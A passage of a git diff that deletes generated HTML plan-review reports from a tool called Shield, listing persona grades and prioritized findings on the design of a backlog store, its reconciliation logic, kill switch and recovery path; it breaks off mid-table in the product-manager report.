-<h3 id="p1--should-fix-plan-quality">P1 — Should Fix (plan quality)</h3>
-<ol>
-<li><strong>[Backend, DX] Lock the skill write-helper signature in EPIC-1-S1/S2 ACs.</strong> This is the carried-forward PRD-review P1, but TRD §12 Q3 still punts the signature to &quot;/lld or implementation.&quot; Pin name, module path, params, return, and raise-on-invalid behavior now (e.g. <code>capture(text, *, kind=&quot;task&quot;, feature=None, epic=None, source) -&gt; entry_id</code> in <code>shield/scripts/backlog_store.py</code>) — downstream skills cannot be built/tested against an undefined shape.</li>
-<li><strong>[Backend, Security] Name the concurrency strategy — atomicity ≠ isolation.</strong> N1 defends &quot;capture racing reconciliation,&quot; but temp-then-rename alone does not prevent lost updates (two read-modify-writes → last-writer-wins drops an entry). Either document the single-writer assumption <em>where N1 describes the threat</em> (N5 already says &quot;single actor&quot;) or add a lock / re-read-and-merge / <code>O_EXCL</code>. Add an interleaved-capture eval.</li>
-<li><strong>[DX, Agile, Backend] Define the feature/epic match + suggestion heuristic.</strong> Replace &quot;best match&quot; / &quot;names expected stable&quot; (EPIC-2-S2, EPIC-3-S2) with a concrete rule: normalization (case/whitespace), tie-break/ambiguity → entry stays, and epic-rename behavior. Add a measurable AC and resolve PRD §9's open &quot;discovery cost&quot; question (or land <code>/lld epic-suggester</code>).</li>
-<li><strong>[Security] Add an eval asserting promotion leaves <code>plan.json</code> byte-unchanged (F6 no-stamping).</strong> F6 is the load-bearing trust boundary; it has an AC but is absent from EPIC-4-S1's listed eval coverage.</li>
-<li><strong>[Security] Add an AC that a malformed/partial <code>backlog.json</code> on read is <em>refused</em> with a named error.</strong> &quot;Validate-or-refuse on read&quot; (F2/N1) currently has no AC proving the refusal path (only crash-atomicity is tested).</li>
-<li><strong>[SRE] Ship the &quot;disable eager prune&quot; kill switch as a story/task.</strong> §14 names it as the rollback action but no story delivers the toggle — add a <code>.shield.json</code> flag (e.g. <code>backlog.auto_reconcile</code>) disabling eager prune and lazy sweep independently. Today the documented mitigation is unactionable.</li>
-<li><strong>[SRE] Log successful removals with rationale.</strong> Only the never-remove-on-doubt path logs (N3). Eager prune / lazy sweep should log <code>{entry id, feature, epic, match-kind, triggering run, gating plan.json}</code> to a defined destination — otherwise a confident-but-wrong removal leaves a git diff with no reasoning.</li>
-<li><strong>[SRE] Close the uncommitted-state recovery gap.</strong> Eager prune fires at end-of-<code>/plan</code>/<code>/implement</code>, possibly before <code>backlog.json</code> is committed — at which point <code>git revert</code> (N4) cannot recover the entry. Commit before the destructive prune, or write pruned entries to a transient <code>.shield/backlog-removed.log</code>.</li>
-<li><strong>[SRE] Instrument the N2 ~1s budget.</strong> &quot;Revisit if breached&quot; (Q1 epic-index) is unfalsifiable without timing — add a debug-gated latency line to <code>/backlog</code> view so the breach signal isn't &quot;a human notices slowness.&quot;</li>
-<li><strong>[PM10] Ground the business-value claim with a rough baseline.</strong> The whole justification rests on an explicitly unvalidated assumption that lost future-work volume is high enough to justify the tool. Count lost/re-derived items over a recent week (git history / chat) before committing all four milestones.</li>
-<li><strong>[Backend] Specify the <code>id</code> contract.</strong> <code>id</code> is required but its type, generation strategy, and uniqueness are undefined, yet remove/promote/prune all key off it. Add type + generation (uuid4/monotonic/slug) + a uniqueness constraint in EPIC-1-S1, plus an AC: &quot;schema rejects duplicate <code>id</code>.&quot;</li>
-<li><strong>[Backend] State the &quot;epic landed&quot; gate as one precise predicate.</strong> F7 (&quot;epic's work appears&quot;), EPIC-3-S2 AC (&quot;epic's stories appear&quot;), and the schema (<code>stories[] minItems:1</code>) say it three ways. Pin it: &quot;epic with matching id/name is present in <code>plan.json.epics[]</code>; story <code>status</code> is <strong>not</strong> consulted.&quot;</li>
-</ol>
-<h3 id="p2--nice-to-have">P2 — Nice to Have</h3>
-<ol>
-<li><strong>[DX]</strong> Name the CI entrypoint + path-filter glob in EPIC-4-S1 (&quot;wire into CI&quot; is not actionable as written).</li>
-<li><strong>[DX]</strong> Add an explicit intra-epic story-dependency note for EPIC-3 (S1+S2 must land before S3).</li>
-<li><strong>[DX]</strong> Specify the badge render format once (EPIC-2-S1 shows it only as an example) and add a local-dev/dry-run loop to the backlog SKILL.md.</li>
-<li><strong>[Agile]</strong> Add code-review + &quot;marketplace version published&quot; steps to the implied Definition of Done (EPIC-4-S2).</li>
-<li><strong>[Agile]</strong> Land or stub <code>/lld backlog-store</code>, <code>/lld epic-suggester</code>, <code>/lld reconciler</code> so the unresolved TODO <code>design_refs</code> resolve before sprint start.</li>
-<li><strong>[Backend]</strong> Add a no-op <code>migrate(doc)-&gt;doc</code> seam + test, or explicitly scope the schema_version AC as doc-only-until-v2 (it currently overstates &quot;migration policy present&quot; as working code).</li>
-<li><strong>[Security]</strong> Add a <code>--dry-run</code> reconciliation canary so a maintainer validates against their real backlog before trusting auto-removal.</li>
-<li><strong>[Security]</strong> Add a fixture for epic-name collision across two different features (PRD §10 risk / §14 trigger) asserting the entry stays.</li>
-<li><strong>[Security]</strong> Define the security purpose of the <code>source ∈ {user, agent}</code> field (provenance/audit-only vs. trust signal) and address agent-injected entries flowing into <code>/plan</code>.</li>
-<li><strong>[Security]</strong> Note in N4/EPIC-1-S4 that git-revert recoverability only covers committed entries — a manual remove of an uncommitted entry is unrecoverable by design.</li>
-<li><strong>[SRE]</strong> Give the manual <code>/backlog</code> audit a concrete cadence and &quot;what reading triggers action.&quot;</li>
-<li><strong>[SRE]</strong> Add a recovery-rehearsal eval (assert <code>git revert</code> / restore brings a wrongly-pruned entry back).</li>
-<li><strong>[PM5]</strong> Add a 2–3 sentence plain-language executive summary atop <code>trd.md</code> and <code>plan.md</code> before the schema-/pipeline-heavy detail.</li>
-</ol>
-<h2 id="detailed-agent-findings">Detailed Agent Findings</h2>
-<table>
-<thead>
-<tr>
-<th>Agent</th>
-<th style="text-align:center">Grade</th>
-<th>Detailed Report</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX Engineer</td>
-<td style="text-align:center">B</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/dx-engineer.md">detailed/dx-engineer.md</a></td>
-</tr>
-<tr>
-<td>Agile Coach</td>
-<td style="text-align:center">B</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/agile-coach.md">detailed/agile-coach.md</a></td>
-</tr>
-<tr>
-<td>Backend Engineer</td>
-<td style="text-align:center">B</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/backend-engineer.md">detailed/backend-engineer.md</a></td>
-</tr>
-<tr>
-<td>Security Engineer</td>
-<td style="text-align:center">B</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/security-engineer.md">detailed/security-engineer.md</a></td>
-</tr>
-<tr>
-<td>SRE</td>
-<td style="text-align:center">B</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/sre.md">detailed/sre.md</a></td>
-</tr>
-<tr>
-<td>Product Manager (PM1–PM10)</td>
-<td style="text-align:center">A</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/product-manager.md">detailed/product-manager.md</a></td>
-</tr>
-</tbody>
-</table>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html
deleted file mode 100644
index f7582d3e..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html
+++ /dev/null
@@ -1,133 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="agile-coach--detailed-findings">Agile Coach — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: A−.</strong> A mature re-plan: prior findings folded and traceable, decisions LOCKED, milestone DAG verifiably acyclic with full story coverage and no dangling references, ACs overwhelmingly independently testable. Short of A because EPIC-3-S3 carries an either/or recovery AC that can't be written as a single test, and the same story bundles four concerns.</p>
-<h2 id="evaluation-points-af">Evaluation points (A–F)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Point</th>
-<th>Grade</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>AC1</td>
-<td>Story sizing</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC2</td>
-<td>Story independence</td>
-<td>B+</td>
-</tr>
-<tr>
-<td>AC3</td>
-<td>Dependency ordering</td>
-<td>A</td>
-</tr>
-<tr>
-<td>AC4</td>
-<td>Context completeness</td>
-<td>A</td>
-</tr>
-<tr>
-<td>AC5</td>
-<td>Requirements clarity</td>
-<td>A</td>
-</tr>
-<tr>
-<td>AC6</td>
-<td>Implementation step quality</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC7</td>
-<td>Acceptance criteria testability</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC8</td>
-<td>Sprint-readiness</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC9</td>
-<td>Estimation feasibility</td>
-<td>A</td>
-</tr>
-<tr>
-<td>AC10</td>
-<td>Definition of Done alignment</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC13</td>
-<td>Milestone coverage</td>
-<td>A (M1=5, M2=1, M3=5)</td>
-</tr>
-<tr>
-<td>AC14</td>
-<td>Milestone reference integrity</td>
-<td>A (no dangling milestone_id)</td>
-</tr>
-<tr>
-<td>AC15</td>
-<td>Milestone exit-criteria testability</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC16</td>
-<td>Milestone DAG integrity</td>
-<td>A (acyclic M1→M2→M3)</td>
-</tr>
-</tbody>
-</table>
-<h2 id="findings">Findings</h2>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>AC7</td>
-<td>EPIC-3-S3 AC5 encodes an unresolved OR (&quot;backlog.json committed before the prune <strong>or</strong> appended to .shield/backlog-removed.log&quot;) — not writable as one pass/fail test. Pick one mechanism (LLD leans to the removed-log) and rewrite as a single asserted behavior.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC1/AC15</td>
-<td>EPIC-3-S3 bundles four concerns (eager, lazy, kill switch, recovery); M3's 6th exit criterion folds 10 eval behaviors into one line. Consider splitting S3 into S3a (triggers) + S3b (kill switch + recovery + latency). Not blocking.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC8/AC9</td>
-<td>M2 carries a single story while EPIC-2-S1 sits in M1 — EPIC-2 deliberately straddles M1/M2. Note this in the plan so it doesn't read as a numbering slip.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC6</td>
-<td>N2 ~1s target is verified only by a debug line, not an assertion. State the WARN threshold the human checks against (e.g. &quot;log WARN if view+sweep &gt; 1s&quot;).</td>
-</tr>
-</tbody>
-</table>
-<p>No P0 findings. Dependency ordering and milestone integrity (coverage, references, DAG, exit-criteria testability) all pass programmatic verification.</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html
deleted file mode 100644
index a1ce3ec0..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html
+++ /dev/null
@@ -1,99 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="backend-engineer--detailed-findings">Backend Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: B−.</strong> A well-structured, honestly-bounded plan with excellent error/idempotency/testability discipline, held back from B+/A− by three contract defects that only surface when the design is placed next to the real <code>manifest.json</code> / <code>plan.json</code> / <code>shield.schema.json</code>.</p>
-<h2 id="evaluation-points-af">Evaluation points (A–F)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Point</th>
-<th>Grade</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>1</td>
-<td>F8 &quot;epic landed&quot; predicate consistency</td>
-<td>B</td>
-</tr>
-<tr>
-<td>2</td>
-<td>Single-writer concurrency claim (N1)</td>
-<td>B+</td>
-</tr>
-<tr>
-<td>3</td>
-<td>Atomic-write + validate-or-refuse correctness</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>4</td>
-<td>The id contract</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>5</td>
-<td>LLD API contracts implementable as specified</td>
-<td>C+</td>
-</tr>
-<tr>
-<td>6</td>
-<td>Python packaging via uv</td>
-<td>B</td>
-</tr>
-<tr>
-<td>7</td>
-<td>Error semantics</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>8</td>
-<td>Idempotency</td>
-<td>A</td>
-</tr>
-<tr>
-<td>9</td>
-<td>Testability</td>
-<td>A−</td>
-</tr>
-</tbody>
-</table>
-<h2 id="p0-findings-verified-against-live-schemas">P0 findings (verified against live schemas)</h2>
-<h3 id="p0-1--reconcilesuggest_-contracts-dont-match-the-real-manifestjsonplanjson-shapes">P0-1 — <code>reconcile</code>/<code>suggest_*</code> contracts don't match the real <code>manifest.json</code>/<code>plan.json</code> shapes</h3>
-<p>Every cross-document reference treats <code>manifest</code> and <code>plans</code> as opaque <code>dict</code>s, but the live artifacts have a specific shape the contracts contradict. <code>manifest.json</code> is <code>{&quot;schema_version&quot;:…, &quot;features&quot;:[ {name, artifacts:{research,prd,plan_json,plan_md,plan_arch_md}, reviews, updated} ]}</code> — a list keyed by <code>name</code>, with a <strong>boolean</strong> <code>plan_json</code> flag and <strong>no plan path stored</strong>. <code>reconcile(entry, *, manifest: dict, plans: dict)</code> (<code>lld-reconciler.md</code> §5) never defines <code>plans</code> and never says the reconciler must <em>derive</em> <code>docs/shield/&lt;feature&gt;/plan.json</code>.
-<strong>Fix:</strong> pin the real shapes in <code>lld-reconciler.md</code> §5 and <code>lld-epic-suggester.md</code> §5; define <code>plans: dict[str, dict]</code> (feature-slug → parsed plan.json) populated by reading <code>docs/shield/&lt;feature&gt;/plan.json</code> for each feature whose <code>artifacts.plan_json is True</code>; state the flag is <code>plan_json</code> (boolean) and the path is derived. Add an EPIC-4-S1 fixture from the actual manifest schema.</p>
-<h3 id="p0-2--f8-match-existing-epic-by-id-matches-a-positional-slot-not-a-stable-identity">P0-2 — F8 &quot;match existing-epic by id&quot; matches a positional slot, not a stable identity</h3>
-<p>Epic ids are positional <code>EPIC-N</code> slugs assigned by <code>/plan</code>, not durable identifiers. After any re-<code>/plan</code>, <code>EPIC-2</code> points at a different epic. An existing-epic backlog entry stamped <code>EPIC-2</code> will then match the wrong epic (false removal) or fail to match (entry rots). Verified: <code>plan-trd-refactor-20260524</code> <code>EPIC-2 = &quot;Story schema and design traceability&quot;</code> vs <code>pm-restructure-v0-20260521</code> <code>EPIC-2 = &quot;Global authoring…&quot;</code>.
-<strong>Fix:</strong> match existing epics by normalized <code>name</code> too (same predicate as proposed-new); treat <code>EPIC-N</code> only as a within-a-single-plan disambiguator. If id-matching is kept, document the re-plan failure mode and add a &quot;epic reordered across a re-plan&quot; eval.</p>
-<h3 id="p0-3--kill-switch-backlogauto_reconcile-cannot-live-in-shieldjson-as-the-schema-stands">P0-3 — Kill switch <code>backlog.auto_reconcile</code> cannot live in <code>.shield.json</code> as the schema stands</h3>
-<p><code>shield/schemas/shield.schema.json</code> has <code>additionalProperties: false</code> and properties <code>[project, domains, output_dir, reviewers, devcontainer, external_skills]</code> — no <code>backlog</code> key. Adding <code>backlog.auto_reconcile</code> to a real <code>.shield.json</code> fails validation, and no story includes the schema change.
-<strong>Fix:</strong> add a task+AC (EPIC-3-S3, reflected in EPIC-4-S2 version bump) to extend <code>shield.schema.json</code> with an optional <code>backlog</code> object (<code>{auto_reconcile: bool, default true}</code>) + a config example. Without this the documented first-line rollback (TRD §14) is unshippable.</p>
-<h2 id="p1-findings">P1 findings</h2>
-<ul>
-<li><strong>P1-1</strong> — Concurrency eval tests a race the single-writer design says cannot occur. Nothing enforces serialization (no lock). Either the race can't happen (eval vacuous) or it can (read-modify-write is not atomic — <code>os.replace()</code> only makes the rename atomic; loser's entry is silently dropped). Resolve: rescope to sequential, OR add a minimal compare-before-replace/merge and test it.</li>
-<li><strong>P1-2</strong> — F2/EPIC-1-S1 AC says &quot;the schema rejects duplicate id&quot;; JSON Schema (2020-12) cannot express property-level array uniqueness. Reword to &quot;the <strong>validator</strong> (<code>validate_backlog.py</code>) rejects duplicate id with <code>duplicate_entry_id</code>.&quot;</li>
-<li><strong>P1-3</strong> — Feature &quot;name&quot; (manifest) vs &quot;folder slug&quot; (reconciliation key) conflated. Pin the invariant (<code>features[].name</code> == folder slug) and make <code>suggest_feature</code> return that field; add a fixture asserting the suggested value resolves to an existing <code>docs/shield/&lt;value&gt;/</code> path.</li>
-<li><strong>P1-4</strong> — Packaging model unresolved. F3 (&quot;every capturing skill builds against this signature&quot;) implies an importable module, but EPIC-4-S2 hedges (&quot;if backlog scripts are packaged&quot;). Decide at plan time — recommend packaging with a <code>pyproject.toml</code> so the version bump is unconditional; document how a skill calls <code>capture()</code>.</li>
-</ul>
-<h2 id="p2-findings">P2 findings</h2>
-<ul>
-<li><strong>P2-1</strong> — Atomic write omits <code>os.fsync()</code> before <code>os.replace()</code> (power-loss window) and uses a fixed <code>.tmp</code> name (stale-temp collision). Add fsync + unique temp suffix.</li>
-<li><strong>P2-2</strong> — <code>read() -&gt; dict</code> forces every caller to re-validate shape; consider returning the pydantic model (<code>read() -&gt; BacklogDoc</code>).</li>
-<li><strong>P2-3</strong> — <code>RemovalDecision</code> / <code>Candidate</code> payloads referenced but <code>RemovalDecision</code>'s fields (the F9 log fields) are undefined. Add a 4-field dataclass in <code>lld-reconciler.md</code>.</li>
-</ul>
-<p><strong>Verification sources:</strong> <code>shield/schemas/plan.schema.json</code>, <code>shield/schemas/shield.schema.json</code>, <code>docs/shield/manifest.json</code>.</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html
deleted file mode 100644
index 3c6c1ab6..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html
+++ /dev/null
@@ -1,159 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="dx-engineer--detailed-findings">DX Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: A−.</strong> An unusually handoff-ready plan — locked signatures, named errors, an atomic-write recipe, and a kill switch make most stories startable without tribal knowledge. Falls short of A on two interface contracts a developer hits in M1/M3 that are referenced but not pinned.</p>
-<h2 id="evaluation-points-af">Evaluation points (A–F)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Point</th>
-<th>Grade</th>
-<th>Note</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX1</td>
-<td>Plan clarity</td>
-<td>A</td>
-<td>TRD &quot;In one line&quot; + Milestones table convey the goal in &lt;30s.</td>
-</tr>
-<tr>
-<td>DX2</td>
-<td>Story actionability</td>
-<td>A−</td>
-<td>Each story has description + tasks + ACs + design_refs.</td>
-</tr>
-<tr>
-<td>DX3</td>
-<td>Implementation step detail</td>
-<td>A−</td>
-<td>Exact file paths, locked signature, write recipe, validator command.</td>
-</tr>
-<tr>
-<td>DX4</td>
-<td>Ambiguity audit</td>
-<td>B+</td>
-<td>&quot;LOCKED&quot; decisions, named errors; residual: N2 &quot;≲1s&quot;, &quot;audit cadence (e.g. monthly)&quot;.</td>
-</tr>
-<tr>
-<td>DX5</td>
-<td>Context sufficiency</td>
-<td>A</td>
-<td>PRD framing, TRD §1 reader list, §8 alternatives, carried-forward trace.</td>
-</tr>
-<tr>
-<td>DX6</td>
-<td>Dependency clarity</td>
-<td>A</td>
-<td>Milestone DAG + explicit EPIC-3-S3 intra-epic dependency.</td>
-</tr>
-<tr>
-<td>DX7</td>
-<td>Tool &amp; access requirements</td>
-<td>B</td>
-<td><code>uv</code> named; missing Python version + pydantic/jsonschema prereq statement.</td>
-</tr>
-<tr>
-<td>DX8</td>
-<td>Handoff readiness</td>
-<td>A−</td>
-<td>Locked signatures, named errors, atomic-write recipe, kill-switch key.</td>
-</tr>
-<tr>
-<td>DX9</td>
-<td>Service boundaries</td>
-<td>A</td>
-<td>Three components cleanly separated; single writer.</td>
-</tr>
-<tr>
-<td>DX10</td>
-<td>API &amp; data flow design</td>
-<td>B+</td>
-<td><code>manifest.json</code> field names not pinned as ground truth.</td>
-</tr>
-<tr>
-<td>DX11</td>
-<td>Deployment strategy</td>
-<td>A−</td>
-<td>Additive behind kill switch; 3-tier rollback.</td>
-</tr>
-<tr>
-<td>DX12</td>
-<td>CI/CD integration</td>
-<td>B+</td>
-<td>Path glob named, but CI entrypoint still a task, not a value.</td>
-</tr>
-<tr>
-<td>DX13</td>
-<td>Error handling patterns</td>
-<td>A</td>
-<td>Failure modes enumerated per component; never-remove-on-doubt.</td>
-</tr>
-<tr>
-<td>DX14</td>
-<td>Configuration management</td>
-<td>A−</td>
-<td>One config key fully specified; recovery log path defined.</td>
-</tr>
-<tr>
-<td>DX15</td>
-<td>Developer onboarding</td>
-<td>B+</td>
-<td>Dry-run loop mandated but not yet written.</td>
-</tr>
-</tbody>
-</table>
-<h2 id="findings">Findings</h2>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>DX10</td>
-<td>Pin the <code>manifest.json</code> read-contract in TRD §11 (exact keys read + example) so EPIC-2-S1/EPIC-3-S2 don't reverse-engineer the live file. (Overlaps backend P0-1.)</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX12</td>
-<td>Resolve the CI entrypoint to a concrete value (the actual workflow file + runner), not a task, so the eval-gate AC is verifiable.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX4/DX15</td>
-<td>Replace &quot;e.g. monthly&quot; audit cadence with a fixed interval + numeric trigger (lift PRD §7 thresholds verbatim).</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX7/DX15</td>
-<td>State runtime prereqs once in the backlog SKILL.md (Python ≥3.x via uv; validator uses pydantic+jsonschema).</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX1</td>
-<td>Label the two composites inline — PRD-review 3.12 vs plan-review 3.14 — to avoid a misread in the plan.md header.</td>
-</tr>
-</tbody>
-</table>
-<p>No P0 findings from DX: the deferred TRD is present and complete, the prior P0 (gate-0d) is folded, locked decisions propagate consistently, every story has self-contained ACs.</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html
deleted file mode 100644
index dfa5731a..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html
+++ /dev/null
@@ -1,109 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="product-manager--detailed-findings-pm1pm10-decomposed">Product Manager — Detailed Findings (PM1–PM10 decomposed)</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: A</strong> (average of 10 dim grades = 3.6). Dispatched as 10 parallel dim subagents per the pm-restructure-v0 registry.</p>
-<table>
-<thead>
-<tr>
-<th>Dim</th>
-<th>Name</th>
-<th>Severity</th>
-<th>Grade</th>
-<th>Gap / note</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>PM1</td>
-<td>User impact clarity</td>
-<td>Critical</td>
-<td>A</td>
-<td>Named personas (P1 Ashwini/maintainer, P2 the agent); concrete impact; §7 numeric magnitude.</td>
-</tr>
-<tr>
-<td>PM2</td>
-<td>Problem-solution fit</td>
-<td>Critical</td>
-<td>A</td>
-<td>&quot;nowhere to park that work&quot; → ordered store + reconciliation directly fits.</td>
-</tr>
-<tr>
-<td>PM3</td>
-<td>Scope discipline (plan)</td>
-<td>Important</td>
-<td>A</td>
-<td>Explicit out-of-scope (hooks, per-feature, state machine, pm-sync, locking) + §8 alternatives + validate-the-bet gate. Opposite of kitchen-sink.</td>
-</tr>
-<tr>
-<td>PM4</td>
-<td>Prioritization rationale</td>
-<td>Important</td>
-<td>B</td>
-<td>Sequencing + named deps + PM10 value-gate present, but <strong>no effort/impact estimates per phase</strong>; priorities nearly all &quot;high&quot;.</td>
-</tr>
-<tr>
-<td>PM5</td>
-<td>Stakeholder communicability</td>
-<td>Important</td>
-<td>B</td>
-<td>TRD &quot;In one line&quot; + PRD §3 give a plain entry point, but docs are otherwise pervasively engineering-framed; <strong>no dedicated stakeholder/executive summary</strong>.</td>
-</tr>
-<tr>
-<td>PM6</td>
-<td>Market / competitive awareness</td>
-<td>Warning</td>
-<td>B</td>
-<td>PM-tool backlog named as incumbent + differentiated, but the <strong>buy-vs-build case is asserted, not reasoned</strong>.</td>
-</tr>
-<tr>
-<td>PM7</td>
-<td>Adoption &amp; rollout risk</td>
-<td>Important</td>
-<td>A</td>
-<td>Capture-friction risk + mitigation; the no-hooks bet surfaced as an unvalidated assumption.</td>
-</tr>
-<tr>
-<td>PM8</td>
-<td>Success metrics</td>
-<td>Important</td>
-<td>A</td>
-<td>Four §7 metrics, three with numeric thresholds + counters; manual measurement mechanism named (no telemetry).</td>
-</tr>
-<tr>
-<td>PM9</td>
